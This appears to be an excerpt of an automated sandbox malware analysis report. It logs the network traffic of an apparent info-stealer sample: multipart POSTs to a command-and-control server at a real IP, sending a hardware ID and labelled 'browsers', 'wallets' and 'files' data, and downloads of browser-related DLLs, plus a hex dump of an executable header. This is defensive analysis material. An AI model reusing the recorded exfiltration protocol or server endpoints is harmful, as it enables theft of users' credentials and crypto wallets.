00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 22:32:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "13bf0-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /300e6d86f44da037.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBHost: 89.105.198.253Content-Length: 223Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 43 32 41 39 38 41 42 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 65 6f 77 73 74 65 72 69 6f 6c 61 6e 64 31 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 2d 2d 0d 0a Data Ascii: ------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="hwid"84C2A98AB19D1524750037------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="build"meowsterioland16------KJJJKFIIIJJJECAAEHDB--
Source: global traffic HTTP traffic detected: POST /300e6d86f44da037.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCFIEBKEGHIDGCAFBFHost: 89.105.198.253Content-Length: 463Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 46 49 45 42 4b 45 47 48 49 44 47 43 41 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 39 2e 31 30 35 2e 31 39 38 2e 32 35 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 46 49 45 42 4b 45 47 48 49 44 47 43 41 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 46 49 45 42 4b 45 47 48 49 44 47 43 41 46 42 46 2d 2d 0d 0a Data Ascii: ------FBFCFIEBKEGHIDGCAFBFContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 89.105.198.253 Port 80</address></body></html>------FBFCFIEBKEGHIDGCAFBFContent-Disposition: form-data; name="message"browsers------FBFCFIEBKEGHIDGCAFBF--
Source: global traffic HTTP traffic detected: POST /300e6d86f44da037.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJEHJKJEBGHJJKEBGIHost: 89.105.198.253Content-Length: 462Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 39 2e 31 30 35 2e 31 39 38 2e 32 35 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 2d 2d 0d 0a Data Ascii: ------HJKJEHJKJEBGHJJKEBGIContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 89.105.198.253 Port 80</address></body></html>------HJKJEHJKJEBGHJJKEBGIContent-Disposition: form-data; name="message"plugins------HJKJEHJKJEBGHJJKEBGI--
Source: global traffic HTTP traffic detected: POST /300e6d86f44da037.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHHost: 89.105.198.253Content-Length: 5890Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/sqlite3.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /300e6d86f44da037.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 89.105.198.253Content-Length: 4794Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /300e6d86f44da037.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKHost: 89.105.198.253Content-Length: 1646Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /300e6d86f44da037.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEBKJJDGHCBGCAAKEHDHost: 89.105.198.253Content-Length: 151Connection: Keep-AliveCache-Control: no-cacheData Raw: 68 74 74 70 3a 2f 2f 38 39 2e 31 30 35 2e 31 39 38 2e 32 35 33 2f 33 30 30 65 36 64 38 36 66 34 34 64 61 30 33 37 2e 70 68 70 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 44 2d 2d 0d 0a Data Ascii: http://89.105.198.253/300e6d86f44da037.php------KKEBKJJDGHCBGCAAKEHDContent-Disposition: form-data; name="file"------KKEBKJJDGHCBGCAAKEHD--
Source: global traffic HTTP traffic detected: POST /300e6d86f44da037.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECFHost: 89.105.198.253Content-Length: 109Connection: Keep-AliveCache-Control: no-cacheData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 2d 2d 0d 0a Data Ascii: ------AAAEBAFBGIDHCBFHIECFContent-Disposition: form-data; name="file"------AAAEBAFBGIDHCBFHIECF--
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/freebl3.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/mozglue.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/msvcp140.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/nss3.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/softokn3.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/vcruntime140.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /300e6d86f44da037.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBGHost: 89.105.198.253Content-Length: 1262Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /300e6d86f44da037.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFHost: 89.105.198.253Content-Length: 462Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 39 2e 31 30 35 2e 31 39 38 2e 32 35 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 2d 2d 0d 0a Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 89.105.198.253 Port 80</address></body></html>------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="message"wallets------FBKFCFBFIDGCGDHJDBKF--
Source: global traffic HTTP traffic detected: POST /300e6d86f44da037.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAEHost: 89.105.198.253Content-Length: 460Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 39 2e 31 30 35 2e 31 39 38 2e 32 35 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 89.105.198.253 Port 80</address></body></html>------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="message"files------CFBFHIEBKJKFHIEBFBAE--
Source: global traffic HTTP traffic detected: POST /300e6d86f44da037.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBGHost: 89.105.198.253Content-Length: 455Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 39 2e 31 30 35 2e 31 39 38 2e 32 35 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 89.105.198.253 Port 80</address></body></html>------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="message"------ECGDHDHJEBGHJKFIECBG--
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NOVOSERVE-ASNL NOVOSERVE-ASNL
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: unknown TCP traffic detected without corresponding DNS query: 89.105.198.253
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00054C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00054C70
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/sqlite3.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/freebl3.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/mozglue.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/msvcp140.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/nss3.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/softokn3.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a50c1b38c13f8f79/vcruntime140.dll HTTP/1.1Host: 89.105.198.253Cache-Control: no-cache
